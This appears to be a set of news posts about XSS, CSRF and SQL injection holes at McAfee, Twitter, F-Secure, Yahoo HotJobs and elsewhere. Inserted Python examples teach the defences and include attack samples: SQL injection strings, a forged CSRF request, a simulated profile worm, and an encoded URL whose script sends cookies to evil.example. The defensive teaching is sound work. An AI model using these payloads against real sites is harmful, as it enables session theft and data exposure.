Updated 5:15 p.m. PDT with McAfee saying most of the vulnerabilities have been fixed.
Security researcher Mike Bailey released this screen shot showing that he gained access to McAfee Secure via a cross-site request forgery hole. (Credit: Skeptikal.org)
Security vulnerabilities on McAfee sites, including one designed to scan customers' sites for flaws, exposed certain customer accounts and could have been used for phishing attacks in which malware disguised as McAfee software could be distributed, security experts say.
McAfee said late on Tuesday that most of the vulnerabilities were fixed, except for one part of the Web site that was taken offline to be fixed.
The McAfee sites were found to be vulnerable to cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks that could be used to phish customers who believe they are visiting the security vendor's own site, according to an article on ReadWriteWeb.
Ironically, one of the vulnerable sites was McAfee Secure, which scans customer sites to determine if they are vulnerable to such attacks. The problem would signal that either McAfee doesn't run McAfee Secure across all of its own sites or the product doesn't work well, the report said.
To fall victim to a cross-site request forgery attack on that site, targets would have to be logged into their McAfee accounts and browse to a malicious Web site that exploits the vulnerability, according to the Risky.biz site.
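The precondition described above (a logged-in victim who merely loads an attacker's page) is what makes CSRF work: the browser attaches the victim's session cookie to the forged request. The following is an added example, not McAfee's code, showing a hypothetical account endpoint that trusts the cookie alone beside one that also demands a per-session token and checks the Origin header. The endpoint, session store, secret and origins are all assumptions constructed for illustration.

```python
import hashlib
import hmac
import secrets

# Hypothetical server state, constructed for this example.
SERVER_SECRET = secrets.token_bytes(32)          # per-deployment secret (assumed)
SITE_ORIGIN = "https://account.example"           # the site's own origin (assumed)
SESSIONS = {"sess-victim": {"user": "alice", "email": "alice@example.com"}}


def csrf_token(session_id: str) -> str:
    """Per-session token: only a page the site served to this session can embed it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def vulnerable_change_email(cookies: dict, form: dict) -> str:
    """Trusts the session cookie alone. The browser attaches that cookie to a
    cross-site POST too, so an auto-submitting form on an attacker page succeeds."""
    session = SESSIONS.get(cookies.get("session"))
    if session is None:
        return "401 not logged in"
    session["email"] = form["email"]
    return "200 email changed"


def hardened_change_email(cookies: dict, form: dict, origin) -> str:
    """Requires a token bound to the session, and rejects a foreign Origin
    header when the browser supplies one."""
    session_id = cookies.get("session")
    session = SESSIONS.get(session_id)
    if session is None:
        return "401 not logged in"
    if not hmac.compare_digest(form.get("csrf_token", ""), csrf_token(session_id)):
        return "403 csrf token missing or wrong"
    if origin is not None and origin != SITE_ORIGIN:
        return "403 cross-origin request"
    session["email"] = form["email"]
    return "200 email changed"


def attack_scenario() -> dict:
    """The preconditions from the article: the victim is logged in (cookie
    present) and loads an attacker page that posts a forged form. Constructed."""
    victim_cookies = {"session": "sess-victim"}
    forged = {"email": "attacker@evil.example"}   # no token: the attacker cannot read one
    results = {}
    results["vulnerable"] = vulnerable_change_email(victim_cookies, dict(forged))
    results["email_after_vulnerable"] = SESSIONS["sess-victim"]["email"]
    SESSIONS["sess-victim"]["email"] = "alice@example.com"   # reset for the next run
    results["forged_vs_hardened"] = hardened_change_email(
        victim_cookies, dict(forged), "https://evil.example")
    # A legitimate submission from the site's own page, which embedded the token.
    legit = {"email": "alice@new.example", "csrf_token": csrf_token("sess-victim")}
    results["legit_vs_hardened"] = hardened_change_email(victim_cookies, legit, SITE_ORIGIN)
    results["email_after_hardened"] = SESSIONS["sess-victim"]["email"]
    return results


if __name__ == "__main__":
    for key, value in attack_scenario().items():
        print(f"{key}: {value}")
```

The token check is what stops the forged request: the attacker's page can make the victim's browser send the cookie, but the same-origin policy keeps it from reading a page on the target site to learn the token. The Origin check is a second, independent layer; it is skipped only when the browser sends no Origin header at all, so it must never be the sole defence.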
Such attacks on sites of antivirus vendors are particularly dangerous because they enable attackers to create fake versions of security products that install Trojans or other malware and customers will trust it, Lance James, co-founder of Secure Science Corporation, told ReadWriteWeb.
The hole on the McAfee Secure site would indicate that the company failed to comply with PCI requirements for Approved Scanning Vendors, didn't use a secure software development lifecycle in building the application, and neglected to do an in-depth penetration test of the site, security researcher Mike Bailey wrote on his Skeptikal.org blog on Monday.
McAfee spokesman Joris Evers said the site taken offline was the McAfee Knowledge Center, which is part of its customer support site that uses software from a third-party provider. The site had a cross-site scripting vulnerability, he said.
"These types of vulnerabilities are rarely exploited in the wild and thus aren't deemed to be severe," he said in an e-mail. None of the vulnerabilities exposed any McAfee corporate information and the company had not seen any malicious exploitation of the vulnerabilities, he added.
"McAfee has strict policies in place for its own Web sites and for services provided by third parties," Evers said. "We are investigating how these particular vulnerabilities were not identified in our screening process and will adjust our processes if necessary."
McAfee isn't the only security company to have security problems on its site. Last month, The Register reported on a cross-site scripting vulnerability on Symantec's site. And in February, a Romanian hacker site claimed to have used cross-site scripting and SQL injection attacks to breach the sites of F-Secure, Kaspersky, and BitDefender.
Google released a new version of its Chrome browser Thursday to fix a high-severity security problem.
The problem affects Google's mainstream stable version of Chrome and is fixed in the new version 1.0.154.59. Google has built Chrome so it updates itself automatically with no user intervention, though the browser must be restarted for the new version to run.
The security problem, reported April 8 by Roi Saltzman of the IBM Rational Application Security Research Group, allowed cross-site scripting attacks, in which the browser is made to run attacker-supplied script, such as JavaScript, in the context of a site the user trusts, enabling a variety of attacks, including impersonation or phishing.
Mark Larson, Google Chrome program manager, described the problem this way in a blog posting Thursday:
An error in handling URLs with a chromehtml: protocol could allow an attacker to run scripts of his choosing on any page or enumerate files on the local disk under certain conditions.
If a user has Google Chrome installed, visiting an attacker-controlled Web page in Internet Explorer could have caused Google Chrome to launch, open multiple tabs, and load scripts that run after navigating to a URL of the attacker's choice. Such an attack only works if Chrome is not already running.
Michael Mooney, aka "Mikeyy" (Credit: Michael Mooney)
The teenager who takes credit for the worms that hit Twitter earlier this week has been hired by a Web application development firm and on Friday released a fifth worm on the microblogging site, he said.
Twitter fought off four waves of worm attacks last weekend and into Monday in which Twitter users were infected just by clicking on the name or image of someone whose account was infected. The worms appeared to do no damage other than spread to infected users' followers and modify profile pages.
Michael Mooney, a 17-year-old living in Brooklyn, N.Y., told CNET News that he wrote the worms because he was bored and wanted to bring Twitter's attention to the security holes.
Mooney also grabbed the attention of Travis Rowland, founder of ExqSoft in Hammond, Ore., who has hired the teen.
Rowland told CNET News on Friday that he saw the worms on Twitter and was impressed with Mooney's skills so he contacted him about working for him doing security analysis. "I saw his Web site and he coded that all from hand and it was pretty impressive; it was a complete Twitter clone," Rowland said.
After landing the job, Mooney spread the latest worm, which exploits a fifth vulnerability at the site, he said. Asked why he doesn't contact Twitter directly instead of launching the attacks, the graduating high school senior said he had tried but had gotten no response.
"I just want to let (Twitters) know that my intent is not to aggravate them," Mooney said in a phone interview with CNET News. "It's probably not the best way, but it's the only way I can reach out to Twitter so they will fix the vulnerability."
The latest worm exploits a cross-site scripting vulnerability and posts messages from infected accounts that mention celebrities and Mooney's hiring by ExqSoft, according to a blog post by Graham Cluley, a senior technology consultant with security firm Sophos.
Rowland blasted Twitter for not adequately protecting its site. "It's a complete failure on their part," he said.
Twitter executives did not respond to an e-mail seeking comment.
Mooney is not the first hacker to have parlayed online stunts into profit. A New Zealand teenager arrested in 2007 on charges of operating a huge botnet that was used to steal from bank accounts was asked to be a speaker at TelstraClear customer seminars late last year and was used in an advertising campaign for the telecom's global security unit, according to Computerworld.
"The author of the Anna Kournikova worm was told by his town's mayor that he would be welcome to work on their systems, the notorious teenager behind the Sasser and Network worms was hired by a security firm, and the creator of a Chinese worm which displayed pictures of pandas burning incense was offered a job by one of his victims," Cluley, wrote in a separate blog post.
Cluley criticized ExqSoft's hiring of Mooney, saying the teen should not be rewarded for behaving irresponsibly. The teen not only wasted the time of thousands of Twitter users and company engineers, Cluley said, but put Twitterers at risk of having their identities stolen or malware installed on their machines by financially motivated hackers who could have used the same cross-site scripting flaw that Mooney used.
"In my opinion, I don't believe it was malicious," said Rowland. "He could have been farming for personal information like e-mail addresses and phone numbers. He potentially could have exposed that information to any numerous sources."
In a tweet last weekend, Rowland implored Twitter to not prosecute Mooney, arguing that he did them a favor by alerting them to a security hole.
Asked earlier in the week about the prosecution scenario for Mooney, Jennifer Granick, an attorney with the Electronic Frontier Foundation, said in an e-mail: "If he's 17, he will not be federally prosecuted and the sentencing, should he be found or plead guilty, should be more about rehabilitation than punishment."
Rowland said he plans to help guide Mooney away from pranks and toward a promising career as a white hat hacker.
"He's got a lot of growing up to do but he's a really good guy and he has a lot of passion for what he does," Rowland said. "Hopefully, I can influence him in the right way."
(ABCNews reported on Mooney getting a job early on Friday.)
Twitter security engineers were cleaning up on Monday following a series of worm attacks over the weekend, including at least two credited to a bored 17-year-old.
In the first attack, which began early on Saturday, four new accounts began spreading a worm, compromising about 90 accounts, Twitter co-founder Biz Stone wrote in a posting on the Twitter blog.
The worms appeared to do no damage other than spread to infected users' followers and modify profile pages. You can get infected just by clicking on the name or image of someone whose account was infected.
Later that afternoon, about 100 accounts were compromised in a second wave, followed by another wave on Sunday morning, he wrote. Nearly 10,000 tweets that could have spread the worm were deleted, according to Stone.
Late on Sunday and into Monday morning, Twitter fended off another attack, he said. "Once again, we secured the compromised accounts and deleted any material that would further propagate the worm," he wrote. Stone declined an interview request from CNET News, saying he didn't have time.
The worms exploit a common vulnerability in Web applications called cross-site scripting, which lets an attacker inject script into Web pages that other users view; the script then runs in those users' browsers, with access to their Twitter sessions.
In this instance, Twitter users who clicked on the name or image of anyone sending the worm messages would get infected and then send the message on to all that person's followers. Anyone viewing an infected user's profile would also get infected and pass the worm on.
Interviewed by CNET News on Sunday after the first two iterations circulated, Michael Mooney, a 17-year-old living in Brooklyn, said he created the worms out of boredom. The messages in the first outbreak included a link to rival microblogging site, Stalkdaily.com, which Mooney owns.
Mooney said in the interview that he did not plan on releasing any more worms targeting Twitter. He could not be reached for comment on Monday.
The first worm messages warned people not to go to the StalkDaily site, which would infect a Twitter user's account if they visited the site. The second worm message contained the phrase "Mikeyy" and the third referred to removing the Mikeyy worm but used "bit.ly" to add shortened URLs to messages, said Andy Hayter, anti-malcode program manager for ICSA Labs, which provides third-party validation for security products.
The most recent attack involved a message saying "Hire Mikeyy" and included Mooney's phone number, according to Graham Cluley, a senior technology consultant with security firm Sophos.
"What we're seeing was it was possible for codes to be embedded, small pieces of JavaScript, into people's profiles. This should be fairly elemental to filter out," he said.
While the attacks were mostly a nuisance, they could have been dangerous if spyware or other malware had been downloaded onto Twitter users' computers, Cluley said.
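The propagation described above (script stored in a profile field, run by every browser that renders that profile, then copied into the viewer's own profile) and Cluley's point that such script "should be fairly elemental to filter out" are illustrated by the following added example. It is not Twitter's code or the worm's: the profile store, the visit order and the payload are constructed, and a regular expression stands in for the browser's decision to execute a script element. The fix shown is HTML-escaping the field on output rather than trying to filter script out of the input.

```python
import copy
import html
import re

# Constructed worm payload (not the real worm's code): a script element that,
# when a viewer's browser runs it, copies itself into the viewer's own profile.
WORM = "<script>/* copy this script into the viewer's profile */</script>"

PROFILES = {
    "mikeyy": {"bio": "hello" + WORM},
    "alice": {"bio": "security person"},
    "bob": {"bio": "likes cats"},
}
# Who clicks on whose profile, in order: alice views mikeyy, then bob views alice.
VISITS = [("alice", "mikeyy"), ("bob", "alice")]

SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)


def render_vulnerable(bio: str) -> str:
    """Profile field written into the page as raw HTML."""
    return f"<div class=\"bio\">{bio}</div>"


def render_escaped(bio: str) -> str:
    """Same field, HTML-escaped for a text context: '<' becomes '&lt;', so the
    browser shows the worm's source as text instead of running it."""
    return f"<div class=\"bio\">{html.escape(bio, quote=True)}</div>"


def browser_visits(viewer: str, page: str, profiles: dict) -> bool:
    """Stand-in for a browser: a live <script> element in the page 'runs', and
    the worm writes itself into the viewer's profile. Returns True if infected."""
    match = SCRIPT_RE.search(page)
    if match is None:
        return False
    profiles[viewer]["bio"] += match.group(0)
    return True


def spread(render, profiles: dict, visits) -> list:
    """Replay the visits against a copy of the store; return who got infected."""
    store = copy.deepcopy(profiles)
    infected = []
    for viewer, target in visits:
        if browser_visits(viewer, render(store[target]["bio"]), store):
            infected.append(viewer)
    return infected


def demo() -> dict:
    """Same visits, rendered two ways: unescaped (worm spreads) and escaped."""
    return {
        "vulnerable": spread(render_vulnerable, PROFILES, VISITS),
        "escaped": spread(render_escaped, PROFILES, VISITS),
    }


if __name__ == "__main__":
    print(demo())
```

The escaping function is the right fix only for the context it is written for: `html.escape` protects text and quoted attribute values, while a profile field dropped into a URL, a `style` attribute or inline JavaScript needs the encoding for that context. Trying instead to strip `<script>` from input, which is all the stand-in browser here looks for, misses the other ways a real browser runs script (event-handler attributes, `javascript:` URLs, and so on).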
To avoid such JavaScript-based attacks, you can turn off JavaScript in your browser, or use a utility such as NoScript, an open-source Firefox extension that blocks scripts by default, Hayter recommended.
Users of infected Twitter accounts should also request a password reset and go to the settings page and delete any profile or other information that may have been added during the attack. To reset colors go to the profile design page.
Twittercism has detailed instructions on how to tell if you are infected and how to remove the worm.
And just like e-mail users should be careful what e-mail attachments they open, be careful who you follow on Twitter, Hayter said.
Updated 4:05 p.m. PDT with Sophos comment.
Helsinki-based security firm F-Secure said on Thursday that a breach of its Web site earlier in the week by a Romanian hacker site was limited in scope and impact.
On Wednesday the HackersBlog site said it had used a SQL injection and cross-site scripting attack to get access to data on an F-Secure Web site. Earlier, the site had launched similar attacks on a site of security firm Kaspersky and one belonging to a partner of BitDefender.
F-Secure said the problem with its site was due to a bug in a Web application and not related to an unpatched system.
"One of our servers used in gathering malware statistics had a page that didn't properly sanitize input and was therefore vulnerable to attack," spokesman David Frazer said in an e-mail. "Fortunately we utilize defense-in-depth strategies so the attack was only partly successful. The server was taken down immediately after the blog was discovered to ensure the SQL injection was contained and to also analyze the level of the threat."
Although the attackers could read the F-Secure database information, they were not able to write or manipulate the data and were unable to access any other data on that server because the SQL user only had access to its own database, he said. The data accessed was statistics information used for marketing purposes, he added.
"So while the attack is something we must learn from, it was very minimal with no impact to F-Secure, our partners or our customers," Frazer said.
A Romanian hacker site said on Wednesday it was able to breach the Web site of Helsinki-based security firm F-Secure just as it had gained access to the sites of two other security companies earlier in the week.
F-Secure is "vulnerable to SQL Injection plus Cross Site Scripting," an entry on the HackersBlog site said. "Fortunately, F-Secure doesn't leak sensitive data, just some statistics regarding past virus activity."
An F-Secure spokesman said the company had taken the affected server down and that it was a low-level server that was not critical to the company and had no sensitive or customer data on it, just statistical data for marketing purposes.
"It is slightly embarrassing as a security company that we have had the breach," David Frazer, a spokesman in F-Secure's San Jose, California office, said in a phone interview. "We certainly, as a security company, want to ensure that all of our servers are patched to the levels that they should be."
HackersBlog publicized on its site that it had breached the U.S. Web site of Moscow-based firm Kaspersky on Saturday and the Portugal site of BitDefender on Monday using the same attack techniques.
Kaspersky said on Monday that no sensitive or customer data had been exposed in the breach and that it would ask a database expert to audit its systems. BitDefender said the site that had been breached belonged to an unnamed partner and no customer data was stolen.
SQL injection attacks, in which untrusted input from a Web request is spliced into a database query so that part of it is executed as SQL, have become very popular exploit methods. Cross-site scripting vulnerabilities, which allow an attacker to inject script into Web pages viewed by other users, also are common.
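The bug class described in this article and in Frazer's account above (a page that "didn't properly sanitize input", with damage limited because "the SQL user only had access to its own database") is shown concretely in the following added example. It is not F-Secure's code: the tables, rows and attacker inputs are constructed, an in-memory SQLite database stands in for the statistics server, and SQLite's authorizer hook stands in for the restricted database account.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with constructed data: a public statistics table and
    a table the Web page was never meant to expose."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE malware_stats (family TEXT, detections INTEGER);
        INSERT INTO malware_stats VALUES ('Conficker', 1200);
        INSERT INTO malware_stats VALUES ('Waledac', 300);
        INSERT INTO malware_stats VALUES ('Koobface', 150);
        CREATE TABLE internal_notes (id INTEGER, note TEXT);
        INSERT INTO internal_notes VALUES (1, 'partner contact list, not for the web');
    """)
    return conn


def stats_vulnerable(conn, family: str) -> list:
    """The bug: the request parameter is spliced into the SQL text, so a quote
    in it ends the string literal and the rest is parsed as SQL."""
    sql = f"SELECT family, detections FROM malware_stats WHERE family = '{family}'"
    return conn.execute(sql).fetchall()


def stats_parameterised(conn, family: str) -> list:
    """The fix: the value travels separately from the SQL text and is only
    ever compared, never parsed."""
    sql = "SELECT family, detections FROM malware_stats WHERE family = ?"
    return conn.execute(sql, (family,)).fetchall()


def restrict_to_stats(conn) -> None:
    """Stand-in for the least-privilege database account described above
    (read its own data only): deny reads of other tables and all writes."""
    def authorizer(action, arg1, arg2, dbname, trigger):
        if action == sqlite3.SQLITE_READ and arg1 != "malware_stats":
            return sqlite3.SQLITE_DENY
        if action in (sqlite3.SQLITE_INSERT, sqlite3.SQLITE_UPDATE,
                      sqlite3.SQLITE_DELETE, sqlite3.SQLITE_DROP_TABLE):
            return sqlite3.SQLITE_DENY
        return sqlite3.SQLITE_OK
    conn.set_authorizer(authorizer)


# Constructed attacker inputs for the `family` parameter.
DUMP_ALL = "x' OR '1'='1"
READ_OTHER_TABLE = "x' UNION SELECT note, id FROM internal_notes WHERE '1'='1"


def try_query(fn, conn, value):
    """Run one of the query functions, returning rows or the error text."""
    try:
        return fn(conn, value)
    except sqlite3.Error as exc:
        return f"error: {exc}"


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, dump all:   ", try_query(stats_vulnerable, db, DUMP_ALL))
    print("vulnerable, other table:", try_query(stats_vulnerable, db, READ_OTHER_TABLE))
    print("parameterised, dump all:", try_query(stats_parameterised, db, DUMP_ALL))
    locked = make_db()
    restrict_to_stats(locked)
    print("least privilege, other table:", try_query(stats_vulnerable, locked, READ_OTHER_TABLE))
```

The least-privilege layer behaves the way the article describes: the injection still works against the table the account may read (the dump-all payload returns every row), but the attempt to reach another table fails at the database, which is why an account that can only read its own database limits a breach without fixing it. The parameterised query is the actual fix; the restricted account is the defence in depth that made this one "only partly successful".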
Updated 3:25 p.m. PST with F-Secure comment.
Yahoo's HotJobs site is vulnerable to a phishing-based attack that can give an attacker access to a Yahoo member's mail and other personal accounts, British network service firm Netcraft said Monday, and someone has been taking advantage of it.
In phishing, an attacker sends a bogus e-mail masquerading as a legitimate message from a company, in this case Yahoo HotJobs. Because of a cross-site scripting vulnerability on the HotJobs site, a link that carries specially formatted JavaScript in its URL causes that script to run in the victim's browser as if it were part of the HotJobs page, Netcraft said.
"The script steals the authentication cookies that are sent for the yahoo.com domain and passes them to a different website in the United States, where the attacker is harvesting stolen authentication details," Netcraft said Monday. "Netcraft has informed Yahoo of the latest attack, although at the time of writing, the HotJobs vulnerability and the attacker's cookie harvesting script are both still present."
I'll update this post once Yahoo gets back to me with any comment.
Update 3:44 p.m. PDT: Yahoo acknowledged the vulnerability but said it's fixed now.
"The team was made aware of this particular cross-site scripting issue yesterday morning (Sunday, October 26) and a fix was deployed within a matter of hours. Yahoo appreciates Netcraft's assistance in identifying this issue," the company said in a statement. "As a safety precaution, we recommend users change their passwords, should they still be concerned. Users should always verify via their Sign-in Seal that they are giving their passwords to Yahoo.com."
Yahoo wouldn't comment on how many people might have been affected.
Don't count Internet Explorer out just yet.
On Wednesday, Microsoft released the second public beta for Internet Explorer 8. If anything, this release brings IE up to par with alternative browsers such as Opera, Apple's Safari, and Mozilla's Firefox in terms of security and features. It also pushes Microsoft a little ahead of the competition.
The user interface hasn't changed much since Internet Explorer 8 Beta 1, except to add a Security pull-down menu between Page and Tools on the main toolbar. In addition to blocking phishing sites, IE 8 now highlights the main domain of any Web site you visit. Thus if you think you are on eBay's site and something other than ebay.com is highlighted, chances are you are on the wrong Web site.
IE 8 also contains a cross-site scripting filter, one of the first in a mainstream browser. Cross-site scripting allows an attacker to execute script in a user's browser without the user knowing. The IE 8 filter targets the reflected form of the attack, in which script carried in the request is echoed back into the page: when it detects this, it neuters the script and changes the content on the page with a notice. Users are not presented with an option; IE simply blocks the malicious script from executing and then displays the rest of the page.
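The HotJobs attack described earlier (script carried in a link's URL, echoed by the page, and used to read `document.cookie`) is exactly the reflected case a filter of this kind is meant to catch. The following is an added example, not Microsoft's or Yahoo's code: a simplified model of a reflection-based filter that compares query-string values against the response body and neuters any script-like value the page echoed unencoded. The vulnerable search page, the attacker URL and the detection patterns are constructed for illustration and are far smaller than a real filter's.

```python
import html
import re
from urllib.parse import parse_qsl, urlsplit

# Illustrative patterns only; a real filter carries many more and handles encodings.
SUSPICIOUS = [
    re.compile(r"<\s*script\b", re.IGNORECASE),
    re.compile(r"<\s*(iframe|object|embed)\b", re.IGNORECASE),
    re.compile(r"\bon[a-z]+\s*=", re.IGNORECASE),      # onload=, onerror=, ...
    re.compile(r"javascript\s*:", re.IGNORECASE),
]


def looks_like_script(value: str) -> bool:
    return any(p.search(value) for p in SUSPICIOUS)


def reflected_script(url: str, body: str) -> list:
    """Query-string values that look like script and are echoed verbatim
    (unencoded) into the response body."""
    params = parse_qsl(urlsplit(url).query, keep_blank_values=True)
    return [v for _, v in params if looks_like_script(v) and v in body]


def filter_response(url: str, body: str):
    """Neuter each reflected value by HTML-encoding it where it appears.
    Returns (new_body, fired)."""
    hits = reflected_script(url, body)
    for value in hits:
        body = body.replace(value, html.escape(value, quote=True))
    return body, bool(hits)


def hotjobs_like_search(query: str) -> str:
    """Constructed vulnerable page: echoes the search term unencoded, the
    pattern behind the reflected XSS described for the HotJobs site."""
    return f"<h1>Results for {query}</h1><p>0 jobs found</p>"


# Constructed attacker link; decoded, q is
# <script>new Image().src="https://evil.example/c?"+document.cookie</script>
ATTACK_URL = ("https://jobs.example/search?q=%3Cscript%3Enew%20Image().src%3D"
              "%22https%3A%2F%2Fevil.example%2Fc%3F%22%2Bdocument.cookie%3C%2Fscript%3E")
BENIGN_URL = "https://jobs.example/search?q=security%20engineer"


def demo(url: str) -> dict:
    """Serve the page for this URL, then run the client-side filter over it."""
    q = dict(parse_qsl(urlsplit(url).query))["q"]
    raw = hotjobs_like_search(q)
    filtered, fired = filter_response(url, raw)
    return {"raw": raw, "filtered": filtered, "fired": fired}


if __name__ == "__main__":
    for url in (ATTACK_URL, BENIGN_URL):
        result = demo(url)
        print(f"filter fired: {result['fired']}\n{result['filtered']}\n")
```

Two limits follow directly from how such a filter works. It can only compare the request it sent with the response it got, so stored script like the Twitter profile worms is out of its reach, and any payload the page echoes in a form the patterns do not recognise gets through. The server-side fix is independent of the browser: `hotjobs_like_search` should encode `query` when writing it into the page, and marking the session cookie `HttpOnly` keeps `document.cookie` from exposing it even when script does run.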
In another feature, known as InPrivate, Microsoft allows the user to suspend caching functions while surfing. The scenarios for using InPrivate include using someone else's computer, for instance to buy a gift for a loved one without ruining the surprise, or using an Internet kiosk when you don't want the next person to know which Web sites you visited. While you can currently clear the browser cache with a mouse click, it's an all-or-nothing action. InPrivate temporarily suspends the automatic caching functions, allowing you to keep the rest of your browsing history intact. Apple Safari has offered this feature for a while, but Mozilla Firefox does not.
IE 8 Beta 1 had already introduced several behind-the-scenes security changes. For example, ActiveX components can be installed per user, so installing one no longer requires administrator privileges. In addition, a user must explicitly opt in before a component runs, blocking silent drive-by installs. Components can be restricted per site, so they run only on the site they were installed from. Finally, site developers can request killbits from Microsoft, which can be pushed via Windows Update to disable risky or outdated components.
Also, IE 8 Beta 1 included Microsoft's own brand of malware protection. Earlier this year, Opera added Haute Secure malware protection, and Mozilla enhanced its Google and StopBadware malware protection in Firefox 3.